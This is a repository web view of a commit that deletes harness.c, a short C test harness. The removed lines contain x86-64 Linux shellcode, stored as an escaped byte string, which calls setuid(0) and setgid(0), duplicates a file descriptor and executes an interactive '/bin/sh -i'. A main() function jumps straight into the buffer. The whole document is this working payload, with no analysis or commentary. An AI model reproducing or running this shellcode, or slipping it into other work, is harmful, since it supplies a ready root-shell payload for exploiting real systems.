summaryrefslogtreecommitdiffstats
path: root/harness.c
diff options
context:
space:
mode:
Diffstat (limited to 'harness.c')
-rw-r--r--harness.c7
1 files changed, 0 insertions, 7 deletions
diff --git a/harness.c b/harness.c
deleted file mode 100644
index 10bf6ce..0000000
--- a/harness.c
+++ /dev/null
@@ -1,7 +0,0 @@
-unsigned char buf[] =
-"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"
-"\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"
-"\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"
-"\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"
-"\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
-void main() { (*(void(*)())buf)(); }